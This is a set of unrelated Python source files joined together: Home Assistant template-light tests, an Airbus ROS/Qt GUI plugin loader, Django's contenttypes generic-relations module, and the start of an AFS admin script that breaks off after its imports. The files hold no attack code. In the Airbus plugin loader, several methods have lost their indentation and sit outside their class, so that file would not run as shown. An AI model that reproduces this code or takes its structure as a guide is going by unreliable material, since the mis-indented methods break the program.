                            'value_template': "{{ 1 == 1 }}",
                            'turn_on': {
                                'service': 'light.turn_on',
                                'entity_id': 'light.test_state'
                            },
                            'turn_off': {
                                'service': 'light.turn_off',
                                'entity_id': 'light.test_state'
                            },
                            'set_level': {
                                'service': 'light.turn_on',
                                'data_template': {
                                    'entity_id': 'light.test_state',
                                    'brightness': '{{brightness}}'
                                }
                            },
                            'level_template':
                                '{{42}}'
                        }
                    }
                }
            })

        self.hass.start()
        self.hass.block_till_done()

        state = self.hass.states.get('light.test_template_light')
        assert state is not None

        assert state.attributes.get('brightness') == 42
    def test_friendly_name(self):
        """Test the accessibility of the friendly_name attribute."""
        with assert_setup_component(1, 'light'):
            assert setup.setup_component(self.hass, 'light', {
                'light': {
                    'platform': 'template',
                    'lights': {
                        'test_template_light': {
                            'friendly_name': 'Template light',
                            'value_template': "{{ 1 == 1 }}",
                            'turn_on': {
                                'service': 'light.turn_on',
                                'entity_id': 'light.test_state'
                            },
                            'turn_off': {
                                'service': 'light.turn_off',
                                'entity_id': 'light.test_state'
                            },
                            'set_level': {
                                'service': 'light.turn_on',
                                'data_template': {
                                    'entity_id': 'light.test_state',
                                    'brightness': '{{brightness}}'
                                }
                            }
                        }
                    }
                }
            })

        self.hass.start()
        self.hass.block_till_done()

        state = self.hass.states.get('light.test_template_light')
        assert state is not None

        # The configured friendly_name must surface as a state attribute.
        assert state.attributes.get('friendly_name') == 'Template light'
    def test_icon_template(self):
        """Test icon template."""
        # icon_template renders empty until light.test_state exists, then
        # evaluates to 'mdi:check'.
        with assert_setup_component(1, 'light'):
            assert setup.setup_component(self.hass, 'light', {
                'light': {
                    'platform': 'template',
                    'lights': {
                        'test_template_light': {
                            'friendly_name': 'Template light',
                            'value_template': "{{ 1 == 1 }}",
                            'turn_on': {
                                'service': 'light.turn_on',
                                'entity_id': 'light.test_state'
                            },
                            'turn_off': {
                                'service': 'light.turn_off',
                                'entity_id': 'light.test_state'
                            },
                            'set_level': {
                                'service': 'light.turn_on',
                                'data_template': {
                                    'entity_id': 'light.test_state',
                                    'brightness': '{{brightness}}'
                                }
                            },
                            'icon_template':
                                "{% if states.light.test_state.state %}"
                                "mdi:check"
                                "{% endif %}"
                        }
                    }
                }
            })

        self.hass.start()
        self.hass.block_till_done()

        state = self.hass.states.get('light.test_template_light')
        assert state.attributes.get('icon') == ''

        state = self.hass.states.set('light.test_state', STATE_ON)
        self.hass.block_till_done()

        state = self.hass.states.get('light.test_template_light')

        assert state.attributes['icon'] == 'mdi:check'
    def test_entity_picture_template(self):
        """Test entity_picture template."""
        # Same pattern as the icon test, for the entity_picture attribute.
        with assert_setup_component(1, 'light'):
            assert setup.setup_component(self.hass, 'light', {
                'light': {
                    'platform': 'template',
                    'lights': {
                        'test_template_light': {
                            'friendly_name': 'Template light',
                            'value_template': "{{ 1 == 1 }}",
                            'turn_on': {
                                'service': 'light.turn_on',
                                'entity_id': 'light.test_state'
                            },
                            'turn_off': {
                                'service': 'light.turn_off',
                                'entity_id': 'light.test_state'
                            },
                            'set_level': {
                                'service': 'light.turn_on',
                                'data_template': {
                                    'entity_id': 'light.test_state',
                                    'brightness': '{{brightness}}'
                                }
                            },
                            'entity_picture_template':
                                "{% if states.light.test_state.state %}"
                                "/local/light.png"
                                "{% endif %}"
                        }
                    }
                }
            })

        self.hass.start()
        self.hass.block_till_done()

        state = self.hass.states.get('light.test_template_light')
        assert state.attributes.get('entity_picture') == ''

        state = self.hass.states.set('light.test_state', STATE_ON)
        self.hass.block_till_done()

        state = self.hass.states.get('light.test_template_light')

        assert state.attributes['entity_picture'] == '/local/light.png'
| |
#!/usr/bin/env python
#
# Copyright 2015 Airbus
# Copyright 2017 Fraunhofer Institute for Manufacturing Engineering and Automation (IPA)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import rospy
import uuid
import os
import sys
import __builtin__
import traceback
from xml.etree import ElementTree
from roslib.packages import get_pkg_dir
from python_qt_binding.QtGui import *
from python_qt_binding.QtCore import *
from airbus_pyqt_extend.QtAgiCore import QAgiPackages, get_pkg_dir_from_prefix
from airbus_pyqt_extend.QtAgiGui import QAgiPopup
from airbus_cobot_gui.util import Parameters, CobotGuiException
## @package: plugin_provider
## @version 4.0
## @author Matignon Martin
## @date Last modified 28/02/2014
## @class PluginProvider
## @brief Class for load Python plugin package.
class PluginProvider:
    """
    PluginProvider interacts with ros plugin package. The first is its
    import plugin, and the second is the set plugin configuration which
    it reads.
    """

    # Sub-directory of a plugin package that holds its importable sources.
    PLUGIN_SOURCES_LOCATION = 'src'

    def __init__(self, parent, xml_register_dir):
        """! The constructor.
        @param parent: owner widget providing getContext().
        @param xml_register_dir: path to the plugin register XML file.
        @raise CobotGuiException: if the register file is missing or
               cannot be parsed as XML.
        """
        self._context = parent.getContext()
        # Check dir
        if not os.path.isfile(xml_register_dir):
            raise CobotGuiException('Plugin register file "%s" in package "airbus_cobot_gui" not found'
                                    %(xml_register_dir))
        # Parse xml file
        try:
            self._plugin_register = ElementTree.parse(xml_register_dir)
        except Exception as e:
            raise CobotGuiException(str(e))
def getPkgByName(self, name):
root = self._plugin_register.getroot()
#Find and read node label
plugin_desc = root.find('./plugin[@label="%s"]'%name)
if plugin_desc is None:
raise CobotGuiException('Cannot found package from plugin named "%ss"'%name)
return plugin_desc.attrib['package']
def getInstance(self, plugin_name, plugin_node=None):
"""! Load Python package and provide plugin instance.
@param plugin_name: plugin name.
@type plugin_name: String.
@param plugin_node: plugin xml element tree.
@type plugin_node: Element.
@return plugin_instance: plugin instance.
@type plugin_instance: Plugin.
"""
plugin_pkg_name = None
try:
plugin_pkg_name = self.getPkgByName(plugin_name)
except Exception as ex:
self._context.getLogger().err(str(ex))
return None
plugin_dir = get_pkg_dir(plugin_pkg_name)
plugin_descriptor_file = os.path.join(plugin_dir,"plugin_descriptor.xml")
if not os.path.isfile(plugin_descriptor_file):
self._context.getLogger().err('Cannot found plugin_descriptor.xml into plugin %s'%plugin_name)
return None
plugin_descriptor_root = ElementTree.parse(plugin_descriptor_file).getroot()
plugin_import = plugin_descriptor_root.find('import')
plugin_module_path = plugin_import.attrib['module']
plugin_class_name = plugin_import.attrib['class']
sys.path.append(os.path.join(plugin_dir,self.PLUGIN_SOURCES_LOCATION))
plugin_class_ref = None
try:
#Import plugin package module
module = __builtin__.__import__(plugin_module_path,
fromlist=[plugin_class_name],
level=0)
except Exception as ex:
self._context.getLogger().err("Cannot import plugin '%s' !\n%s"%(plugin_name, str(ex)))
return None
#Get referance to plugin class
plugin_class_ref = getattr(module, plugin_class_name)
if plugin_class_ref is None:
self._context.getLogger().err("Cannot found plugin class '%s' !"%plugin_class_name)
return None
plugin_instance = plugin_class_ref(self._context)
plugin_params = PluginProvider.getParameters(plugin_descriptor_root, plugin_node)
plugin_instance.setup(plugin_descriptor_root, plugin_params)
return plugin_instance
@staticmethod
def getParameters(plugin_descriptor, plugin_node):
parameters = Parameters()
# Try to provide plugin parameters in plugin_descriptor.xml
descriptor_params = plugin_descriptor.find("setup/parameters")
# Add parameters, if parameters found in plugin_descriptor.xml
if descriptor_params is not None:
for param in descriptor_params:
# Append parameters
parameters.putParam(param.attrib['name'], param.attrib['value'])
if plugin_node is not None:
# Check if parameters remapped in airbus_cobot_gui config launch
if plugin_node.find("param") is not None:
for param in plugin_node.iter('param'):
# Update or append parameters
parameters.putParam(param.attrib['name'], param.attrib['value'])
return parameters
class PluginsGroupPopup(QAgiPopup):
    """Translucent popup listing the launchers of one plugin group.

    Shown to the top-right of the group button; closes itself as soon as
    any launcher inside it is clicked.
    """
    def __init__(self, parent):
        QAgiPopup.__init__(self, parent)
        self._context = parent.getContext()
        # Translucent, fixed-width popup anchored relative to the parent button.
        self.setAttribute(Qt.WA_TranslucentBackground)
        self.setFixedWidth(100)
        self.setRelativePosition(QAgiPopup.TopLeft, QAgiPopup.TopRight)
        # Vertical stack holding the launcher widgets.
        self._launchers_layout = QVBoxLayout(self)
        self._launchers_layout.setContentsMargins(2, 2, 2, 2)
        self._launchers_layout.setSpacing(15)
    def setupLaunchers(self, launchers):
        """Add each launcher widget and close the popup when one is clicked."""
        for launcher in launchers:
            # Old-style PyQt signal connection: clicking a launcher closes the popup.
            self.connect(launcher, SIGNAL('clicked()'), self.close)
            self._launchers_layout.addWidget(launcher)
class PluginsGroup(QPushButton):
    """Toolbar button representing a group of plugin launchers.

    The button is enabled only for users whose privilege meets the lowest
    access-rights level among the group's launchers; clicking it opens a
    PluginsGroupPopup with the launchers.
    """
    def __init__(self, parent, xgroup):
        QPushButton.__init__(self, parent)
        self.setFocusPolicy(Qt.NoFocus)
        self.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Preferred)
        self.setIconSize(QSize(80, 80))
        # Disabled until a user with sufficient rights logs in (onUserChanged).
        self.setEnabled(False)
        self._context = parent.getContext()
        self._context.addUserEventListener(self.onUserChanged)
        # Most permissive access level seen among added launchers (lower = less restricted).
        self._min_access_rights = 3
        self._launchers = []
        self.setup(xgroup)

    def setup(self, xgroup):
        """Read 'name' and 'icon' from the group XML node and style the button."""
        group_name = ""
        icon_path = ""
        try:
            group_name = xgroup.attrib['name']
            icon_path = xgroup.attrib['icon']
        except Exception:
            # Narrowed from a bare except: missing attributes are logged, not fatal.
            self._context.getLogger().err("Not name or icon found for plugin group !")
            return
        icon_path = get_pkg_dir_from_prefix(icon_path)
        if os.path.isfile(icon_path):
            self.setIcon(QIcon(icon_path))
        else:
            # Fallback: red rounded button with the group name as text.
            self.setStyleSheet("background-color:rgba(255,0,0,80%);\
                                border-radius: 10px;\
                                font-size: 12pt;\
                                font-weight:60;\
                                color: #ffffff;")
            self.setText(group_name)

    def add(self, launcher):
        """Register a launcher and track the group's lowest access level."""
        launcher.setStyleSheet("background:none;")#R.values.styles.no_background)
        self._launchers.append(launcher)
        if launcher.getAccessRights() < self._min_access_rights:
            self._min_access_rights = launcher.getAccessRights()

    def getContext(self):
        # BUGFIX: the original was missing 'return' and always yielded None.
        return self._context

    def onUserChanged(self, user):
        """Enable the button only when the user's privilege is sufficient."""
        self.setEnabled(user.getUserPrivilege() >= self._min_access_rights)

    def mousePressEvent(self, event):
        """Open the popup listing this group's launchers."""
        popup = PluginsGroupPopup(self)
        popup.setupLaunchers(self._launchers)
        popup.show_()
##Unittest
if __name__ == "__main__":
    from python_qt_binding.QtGui import *
    from python_qt_binding.QtCore import *
    from airbus_cobot_gui.context import Context
    # Manual smoke test: boot a Qt main window hosting a single plugin.
    rospy.init_node('plugin_privider_test')
    a = QApplication(sys.argv)
    utt_appli = QMainWindow()
    context = Context(utt_appli)
    # NOTE(review): hard-coded absolute path is only valid on the dev machine.
    provider = PluginProvider(context, "/home/nhg/AIRBUS/airbus_coop/src/airbus_coop/src/gui/plugins/plugins_register.xml")
    # BUGFIX: PluginProvider has no getPluginInstance(); the method is getInstance().
    plugin = provider.getInstance("SSM")
    utt_appli.setCentralWidget(plugin)
    plugin.onStart()
    utt_appli.show()
    a.exec_()
#End of file
| |
"""
Classes allowing "generic" relations through ContentType and object-id fields.
"""
from __future__ import unicode_literals
from collections import defaultdict
from functools import partial
from django.core.exceptions import ObjectDoesNotExist
from django.db import connection
from django.db import models, router, DEFAULT_DB_ALIAS
from django.db.models import signals
from django.db.models.fields.related import ForeignObject, ForeignObjectRel
from django.db.models.related import PathInfo
from django.db.models.sql.where import Constraint
from django.forms import ModelForm, ALL_FIELDS
from django.forms.models import (BaseModelFormSet, modelformset_factory, save_instance,
modelform_defines_fields)
from django.contrib.admin.options import InlineModelAdmin, flatten_fieldsets
from django.contrib.contenttypes.models import ContentType
from django.utils import six
from django.utils.deprecation import RenameMethodsBase
from django.utils.encoding import smart_text
class RenameGenericForeignKeyMethods(RenameMethodsBase):
    # Metaclass that transparently renames the deprecated
    # get_prefetch_query_set() to get_prefetch_queryset() on subclasses,
    # emitting a PendingDeprecationWarning when the old name is used.
    renamed_methods = (
        ('get_prefetch_query_set', 'get_prefetch_queryset', PendingDeprecationWarning),
    )
class GenericForeignKey(six.with_metaclass(RenameGenericForeignKeyMethods)):
    """
    Provides a generic relation to any object through content-type/object-id
    fields.
    """
    def __init__(self, ct_field="content_type", fk_field="object_id", for_concrete_model=True):
        # Names of the two concrete columns that back this virtual field.
        self.ct_field = ct_field
        self.fk_field = fk_field
        # When False, proxy models keep their own ContentType instead of
        # resolving to the concrete base model's.
        self.for_concrete_model = for_concrete_model
        self.editable = False
    def contribute_to_class(self, cls, name):
        """Register this virtual field on the model class `cls` under `name`."""
        self.name = name
        self.model = cls
        # Attribute used to cache the resolved related object per instance.
        self.cache_attr = "_%s_cache" % name
        cls._meta.add_virtual_field(self)
        # For some reason I don't totally understand, using weakrefs here doesn't work.
        signals.pre_init.connect(self.instance_pre_init, sender=cls, weak=False)
        # Connect myself as the descriptor for this field
        setattr(cls, name, self)
    def instance_pre_init(self, signal, sender, args, kwargs, **_kwargs):
        """
        Handles initializing an object with the generic FK instead of
        content-type/object-id fields.
        """
        if self.name in kwargs:
            value = kwargs.pop(self.name)
            # Translate Model(gfk=obj) into the two underlying column kwargs.
            kwargs[self.ct_field] = self.get_content_type(obj=value)
            kwargs[self.fk_field] = value._get_pk_val()
    def get_content_type(self, obj=None, id=None, using=None):
        # Resolve a ContentType either from a model instance (routes through
        # the instance's db) or from a raw ContentType id + db alias.
        if obj is not None:
            return ContentType.objects.db_manager(obj._state.db).get_for_model(
                obj, for_concrete_model=self.for_concrete_model)
        elif id:
            return ContentType.objects.db_manager(using).get_for_id(id)
        else:
            # This should never happen. I love comments like this, don't you?
            raise Exception("Impossible arguments to GFK.get_content_type!")
    def get_prefetch_queryset(self, instances):
        """Batch-fetch related objects for prefetch_related support."""
        # For efficiency, group the instances by content type and then do one
        # query per model
        fk_dict = defaultdict(set)
        # We need one instance for each group in order to get the right db:
        instance_dict = {}
        ct_attname = self.model._meta.get_field(self.ct_field).get_attname()
        for instance in instances:
            # We avoid looking for values if either ct_id or fkey value is None
            ct_id = getattr(instance, ct_attname)
            if ct_id is not None:
                fk_val = getattr(instance, self.fk_field)
                if fk_val is not None:
                    fk_dict[ct_id].add(fk_val)
                    instance_dict[ct_id] = instance
        ret_val = []
        for ct_id, fkeys in fk_dict.items():
            instance = instance_dict[ct_id]
            ct = self.get_content_type(id=ct_id, using=instance._state.db)
            ret_val.extend(ct.get_all_objects_for_this_type(pk__in=fkeys))
        # For doing the join in Python, we have to match both the FK val and the
        # content type, so we use a callable that returns a (fk, class) pair.
        def gfk_key(obj):
            ct_id = getattr(obj, ct_attname)
            if ct_id is None:
                return None
            else:
                model = self.get_content_type(id=ct_id,
                                              using=obj._state.db).model_class()
                # Normalize the stored fk value via the target pk field so it
                # compares equal to the fetched object's pk.
                return (model._meta.pk.get_prep_value(getattr(obj, self.fk_field)),
                        model)
        # Tuple contract expected by prefetch_related:
        # (queryset, rel_obj_key, instance_key, single, cache_name)
        return (ret_val,
                lambda obj: (obj._get_pk_val(), obj.__class__),
                gfk_key,
                True,
                self.cache_attr)
    def is_cached(self, instance):
        # True when the related object has already been resolved for `instance`.
        return hasattr(instance, self.cache_attr)
    def __get__(self, instance, instance_type=None):
        # Descriptor read: return the cached related object, resolving and
        # caching it on first access (None when the target row is gone).
        if instance is None:
            return self
        try:
            return getattr(instance, self.cache_attr)
        except AttributeError:
            rel_obj = None
            # Make sure to use ContentType.objects.get_for_id() to ensure that
            # lookups are cached (see ticket #5570). This takes more code than
            # the naive ``getattr(instance, self.ct_field)``, but has better
            # performance when dealing with GFKs in loops and such.
            f = self.model._meta.get_field(self.ct_field)
            ct_id = getattr(instance, f.get_attname(), None)
            if ct_id:
                ct = self.get_content_type(id=ct_id, using=instance._state.db)
                try:
                    rel_obj = ct.get_object_for_this_type(pk=getattr(instance, self.fk_field))
                except ObjectDoesNotExist:
                    pass
            setattr(instance, self.cache_attr, rel_obj)
            return rel_obj
    def __set__(self, instance, value):
        # Descriptor write: update both backing columns and the cache together.
        ct = None
        fk = None
        if value is not None:
            ct = self.get_content_type(obj=value)
            fk = value._get_pk_val()
        setattr(instance, self.ct_field, ct)
        setattr(instance, self.fk_field, fk)
        setattr(instance, self.cache_attr, value)
class GenericRelation(ForeignObject):
    """Provides an accessor to generic related objects (e.g. comments)"""
    def __init__(self, to, **kwargs):
        kwargs['verbose_name'] = kwargs.get('verbose_name', None)
        kwargs['rel'] = GenericRel(
            self, to, related_name=kwargs.pop('related_name', None),
            limit_choices_to=kwargs.pop('limit_choices_to', None),)
        # Override content-type/object-id field names on the related class
        self.object_id_field_name = kwargs.pop("object_id_field", "object_id")
        self.content_type_field_name = kwargs.pop("content_type_field", "content_type")
        self.for_concrete_model = kwargs.pop("for_concrete_model", True)
        # A GenericRelation is never a real editable/serialized column.
        kwargs['blank'] = True
        kwargs['editable'] = False
        kwargs['serialize'] = False
        # This construct is somewhat of an abuse of ForeignObject. This field
        # represents a relation from pk to object_id field. But, this relation
        # isn't direct, the join is generated reverse along foreign key. So,
        # the from_field is object_id field, to_field is pk because of the
        # reverse join.
        super(GenericRelation, self).__init__(
            to, to_fields=[],
            from_fields=[self.object_id_field_name], **kwargs)
    def resolve_related_fields(self):
        # Pair the related model's object_id column with this model's pk.
        self.to_fields = [self.model._meta.pk.name]
        return [(self.rel.to._meta.get_field_by_name(self.object_id_field_name)[0],
                 self.model._meta.pk)]
    def get_reverse_path_info(self):
        # Path used by the ORM when traversing from this model to the related one.
        opts = self.rel.to._meta
        target = opts.get_field_by_name(self.object_id_field_name)[0]
        return [PathInfo(self.model._meta, opts, (target,), self.rel, True, False)]
    def get_choices_default(self):
        return super(GenericRelation, self).get_choices(include_blank=False)
    def value_to_string(self, obj):
        # Serialization: render the related pks as a text list.
        qs = getattr(obj, self.name).all()
        return smart_text([instance._get_pk_val() for instance in qs])
    def get_joining_columns(self, reverse_join=False):
        if not reverse_join:
            # This error message is meant for the user, and from user
            # perspective this is a reverse join along the GenericRelation.
            raise ValueError('Joining in reverse direction not allowed.')
        return super(GenericRelation, self).get_joining_columns(reverse_join)
    def contribute_to_class(self, cls, name):
        # virtual_only: no concrete column is created for this field.
        super(GenericRelation, self).contribute_to_class(cls, name, virtual_only=True)
        # Save a reference to which model this class is on for future use
        self.model = cls
        # Add the descriptor for the relation
        setattr(cls, self.name, ReverseGenericRelatedObjectsDescriptor(self, self.for_concrete_model))
    def contribute_to_related_class(self, cls, related):
        # Intentionally a no-op: nothing is added on the related class.
        pass
    def set_attributes_from_rel(self):
        # Intentionally a no-op: rel attributes do not apply here.
        pass
    def get_internal_type(self):
        return "ManyToManyField"
    def get_content_type(self):
        """
        Returns the content type associated with this field's model.
        """
        return ContentType.objects.get_for_model(self.model,
                                                 for_concrete_model=self.for_concrete_model)
    def get_extra_restriction(self, where_class, alias, remote_alias):
        # Extra WHERE clause: the related row's content_type must match this model.
        field = self.rel.to._meta.get_field_by_name(self.content_type_field_name)[0]
        contenttype_pk = self.get_content_type().pk
        cond = where_class()
        cond.add((Constraint(remote_alias, field.column, field), 'exact', contenttype_pk), 'AND')
        return cond
    def bulk_related_objects(self, objs, using=DEFAULT_DB_ALIAS):
        """
        Return all objects related to ``objs`` via this ``GenericRelation``.
        """
        return self.rel.to._base_manager.db_manager(using).filter(**{
            "%s__pk" % self.content_type_field_name:
                ContentType.objects.db_manager(using).get_for_model(
                    self.model, for_concrete_model=self.for_concrete_model).pk,
            "%s__in" % self.object_id_field_name:
                [obj.pk for obj in objs]
        })
class ReverseGenericRelatedObjectsDescriptor(object):
    """
    This class provides the functionality that makes the related-object
    managers available as attributes on a model class, for fields that have
    multiple "remote" values and have a GenericRelation defined in their model
    (rather than having another model pointed *at* them). In the example
    "article.publications", the publications attribute is a
    ReverseGenericRelatedObjectsDescriptor instance.
    """
    def __init__(self, field, for_concrete_model=True):
        self.field = field
        self.for_concrete_model = for_concrete_model
    def __get__(self, instance, instance_type=None):
        # Class access returns the descriptor itself; instance access builds
        # a per-instance related manager.
        if instance is None:
            return self
        # Dynamically create a class that subclasses the related model's
        # default manager.
        rel_model = self.field.rel.to
        superclass = rel_model._default_manager.__class__
        RelatedManager = create_generic_related_manager(superclass)
        qn = connection.ops.quote_name
        # ContentType lookup is routed through the instance's database.
        content_type = ContentType.objects.db_manager(instance._state.db).get_for_model(
            instance, for_concrete_model=self.for_concrete_model)
        join_cols = self.field.get_joining_columns(reverse_join=True)[0]
        manager = RelatedManager(
            model=rel_model,
            instance=instance,
            source_col_name=qn(join_cols[0]),
            target_col_name=qn(join_cols[1]),
            content_type=content_type,
            content_type_field_name=self.field.content_type_field_name,
            object_id_field_name=self.field.object_id_field_name,
            prefetch_cache_name=self.field.attname,
        )
        return manager
    def __set__(self, instance, value):
        # Assignment replaces the whole related set: clear, then re-add.
        manager = self.__get__(instance)
        manager.clear()
        for obj in value:
            manager.add(obj)
def create_generic_related_manager(superclass):
    """
    Factory function for a manager that subclasses 'superclass' (which is a
    Manager) and adds behavior for generic related objects.
    """
    class GenericRelatedObjectManager(superclass):
        def __init__(self, model=None, instance=None, symmetrical=None,
                     source_col_name=None, target_col_name=None, content_type=None,
                     content_type_field_name=None, object_id_field_name=None,
                     prefetch_cache_name=None):
            super(GenericRelatedObjectManager, self).__init__()
            self.model = model
            self.content_type = content_type
            self.symmetrical = symmetrical
            self.instance = instance
            self.source_col_name = source_col_name
            self.target_col_name = target_col_name
            self.content_type_field_name = content_type_field_name
            self.object_id_field_name = object_id_field_name
            self.prefetch_cache_name = prefetch_cache_name
            self.pk_val = self.instance._get_pk_val()
            # Filters that restrict every queryset to this instance's
            # (content_type, object_id) pair.
            self.core_filters = {
                '%s__pk' % content_type_field_name: content_type.id,
                '%s__exact' % object_id_field_name: instance._get_pk_val(),
            }
        def get_queryset(self):
            # Serve from the prefetch cache when available, otherwise filter
            # on the instance's (content_type, object_id) pair.
            try:
                return self.instance._prefetched_objects_cache[self.prefetch_cache_name]
            except (AttributeError, KeyError):
                db = self._db or router.db_for_read(self.model, instance=self.instance)
                return super(GenericRelatedObjectManager, self).get_queryset().using(db).filter(**self.core_filters)
        def get_prefetch_queryset(self, instances):
            # One query for all instances; keyed back by the object_id column.
            db = self._db or router.db_for_read(self.model, instance=instances[0])
            query = {
                '%s__pk' % self.content_type_field_name: self.content_type.id,
                '%s__in' % self.object_id_field_name:
                    set(obj._get_pk_val() for obj in instances)
            }
            qs = super(GenericRelatedObjectManager, self).get_queryset().using(db).filter(**query)
            # We (possibly) need to convert object IDs to the type of the
            # instances' PK in order to match up instances:
            object_id_converter = instances[0]._meta.pk.to_python
            return (qs,
                    lambda relobj: object_id_converter(getattr(relobj, self.object_id_field_name)),
                    lambda obj: obj._get_pk_val(),
                    False,
                    self.prefetch_cache_name)
        def add(self, *objs):
            # Point each object at this instance and save it.
            for obj in objs:
                if not isinstance(obj, self.model):
                    raise TypeError("'%s' instance expected" % self.model._meta.object_name)
                setattr(obj, self.content_type_field_name, self.content_type)
                setattr(obj, self.object_id_field_name, self.pk_val)
                obj.save()
        add.alters_data = True
        def remove(self, *objs):
            # NOTE: removal deletes the related rows (no nulling of the FK pair).
            db = router.db_for_write(self.model, instance=self.instance)
            for obj in objs:
                obj.delete(using=db)
        remove.alters_data = True
        def clear(self):
            db = router.db_for_write(self.model, instance=self.instance)
            for obj in self.all():
                obj.delete(using=db)
        clear.alters_data = True
        def create(self, **kwargs):
            # Force the new object to point at this instance.
            kwargs[self.content_type_field_name] = self.content_type
            kwargs[self.object_id_field_name] = self.pk_val
            db = router.db_for_write(self.model, instance=self.instance)
            return super(GenericRelatedObjectManager, self).using(db).create(**kwargs)
        create.alters_data = True
    return GenericRelatedObjectManager
class GenericRel(ForeignObjectRel):
    # Thin ForeignObjectRel specialization used as the 'rel' of GenericRelation;
    # adds no behavior, only fixes the constructor signature.
    def __init__(self, field, to, related_name=None, limit_choices_to=None):
        super(GenericRel, self).__init__(field, to, related_name, limit_choices_to)
class BaseGenericInlineFormSet(BaseModelFormSet):
    """
    A formset for generic inline objects to a parent.
    """
    # Class attributes ct_field / ct_fk_field / for_concrete_model are set by
    # generic_inlineformset_factory() before instantiation.
    def __init__(self, data=None, files=None, instance=None, save_as_new=None,
                 prefix=None, queryset=None, **kwargs):
        # NOTE(review): save_as_new is accepted but never used here — appears
        # to exist only for signature compatibility; confirm against callers.
        opts = self.model._meta
        self.instance = instance
        self.rel_name = '-'.join((
            opts.app_label, opts.model_name,
            self.ct_field.name, self.ct_fk_field.name,
        ))
        if self.instance is None or self.instance.pk is None:
            # Unsaved parent: no related objects can exist yet.
            qs = self.model._default_manager.none()
        else:
            if queryset is None:
                queryset = self.model._default_manager
            # Restrict to rows pointing at this parent via (content_type, pk).
            qs = queryset.filter(**{
                self.ct_field.name: ContentType.objects.get_for_model(
                    self.instance, for_concrete_model=self.for_concrete_model),
                self.ct_fk_field.name: self.instance.pk,
            })
        super(BaseGenericInlineFormSet, self).__init__(
            queryset=qs, data=data, files=files,
            prefix=prefix,
            **kwargs
        )
    @classmethod
    def get_default_prefix(cls):
        # Prefix uniquely identifies this inline among several on one page.
        opts = cls.model._meta
        return '-'.join((opts.app_label, opts.model_name,
                         cls.ct_field.name, cls.ct_fk_field.name,
                         ))
    def save_new(self, form, commit=True):
        # Seed the new object with the parent's content type and pk before saving.
        kwargs = {
            self.ct_field.get_attname(): ContentType.objects.get_for_model(
                self.instance, for_concrete_model=self.for_concrete_model).pk,
            self.ct_fk_field.get_attname(): self.instance.pk,
        }
        new_obj = self.model(**kwargs)
        return save_instance(form, new_obj, commit=commit)
def generic_inlineformset_factory(model, form=ModelForm,
                                  formset=BaseGenericInlineFormSet,
                                  ct_field="content_type", fk_field="object_id",
                                  fields=None, exclude=None,
                                  extra=3, can_order=False, can_delete=True,
                                  max_num=None,
                                  formfield_callback=None, validate_max=False,
                                  for_concrete_model=True):
    """
    Returns a ``GenericInlineFormSet`` for the given kwargs.
    You must provide ``ct_field`` and ``fk_field`` if they are different from
    the defaults ``content_type`` and ``object_id`` respectively.
    """
    opts = model._meta
    # if there is no field called `ct_field` let the exception propagate
    ct_field = opts.get_field(ct_field)
    if not isinstance(ct_field, models.ForeignKey) or ct_field.rel.to != ContentType:
        # NOTE(review): message says "fk_name" but the failing field is
        # ct_field — misleading wording kept as-is.
        raise Exception("fk_name '%s' is not a ForeignKey to ContentType" % ct_field)
    fk_field = opts.get_field(fk_field)  # let the exception propagate
    # The two generic columns are managed by the formset, never user-edited.
    if exclude is not None:
        exclude = list(exclude)
        exclude.extend([ct_field.name, fk_field.name])
    else:
        exclude = [ct_field.name, fk_field.name]
    FormSet = modelformset_factory(model, form=form,
                                   formfield_callback=formfield_callback,
                                   formset=formset,
                                   extra=extra, can_delete=can_delete, can_order=can_order,
                                   fields=fields, exclude=exclude, max_num=max_num,
                                   validate_max=validate_max)
    # Attach the resolved fields so BaseGenericInlineFormSet can use them.
    FormSet.ct_field = ct_field
    FormSet.ct_fk_field = fk_field
    FormSet.for_concrete_model = for_concrete_model
    return FormSet
class GenericInlineModelAdmin(InlineModelAdmin):
    # Admin inline for models related to their parent via a GenericForeignKey.
    ct_field = "content_type"
    ct_fk_field = "object_id"
    formset = BaseGenericInlineFormSet
    def get_formset(self, request, obj=None, **kwargs):
        """Build the generic inline formset class for this admin request."""
        if 'fields' in kwargs:
            fields = kwargs.pop('fields')
        else:
            fields = flatten_fieldsets(self.get_fieldsets(request, obj))
        if self.exclude is None:
            exclude = []
        else:
            exclude = list(self.exclude)
        # Read-only fields can never be part of the editable formset.
        exclude.extend(self.get_readonly_fields(request, obj))
        if self.exclude is None and hasattr(self.form, '_meta') and self.form._meta.exclude:
            # Take the custom ModelForm's Meta.exclude into account only if the
            # GenericInlineModelAdmin doesn't define its own.
            exclude.extend(self.form._meta.exclude)
        # Normalize [] to None, which modelformset_factory treats as "no excludes".
        exclude = exclude or None
        can_delete = self.can_delete and self.has_delete_permission(request, obj)
        defaults = {
            "ct_field": self.ct_field,
            "fk_field": self.ct_fk_field,
            "form": self.form,
            "formfield_callback": partial(self.formfield_for_dbfield, request=request),
            "formset": self.formset,
            "extra": self.extra,
            "can_delete": can_delete,
            "can_order": False,
            "fields": fields,
            "max_num": self.max_num,
            "exclude": exclude
        }
        # Caller-supplied kwargs win over the admin defaults.
        defaults.update(kwargs)
        if defaults['fields'] is None and not modelform_defines_fields(defaults['form']):
            defaults['fields'] = ALL_FIELDS
        return generic_inlineformset_factory(self.model, **defaults)
class GenericStackedInline(GenericInlineModelAdmin):
    # Generic inline rendered with the stacked (one-form-per-row) template.
    template = 'admin/edit_inline/stacked.html'
class GenericTabularInline(GenericInlineModelAdmin):
    # Generic inline rendered with the compact tabular template.
    template = 'admin/edit_inline/tabular.html'
| |
#!/usr/bin/python
import cProfile
import time,logging
import argparse, string,datetime,sys
import afs
from afs.util.AfsConfig import parseDefaultConfig
from afs.util.DBManager import DBManager
from afs.service.OSDVolService import OSDVolService
from afs.service.OSDCellService import OSDCellService
from afs.service.OSDFsService import OSDFsService
from afs.service.DBsService import DBsService
from afs.service.ProjectService import ProjectService
from afs.model.Volume import Volume
from afs.model.Partition import Partition
from afs.model.ExtendedPartitionAttributes import ExtPartAttr
from afs.lla.UbikPeerLLA import UbikPeerLLA
from afs.lla.OSDVolumeLLA import OSDVolumeLLA
# Command-line options (in addition to the shared afs.argParser options).
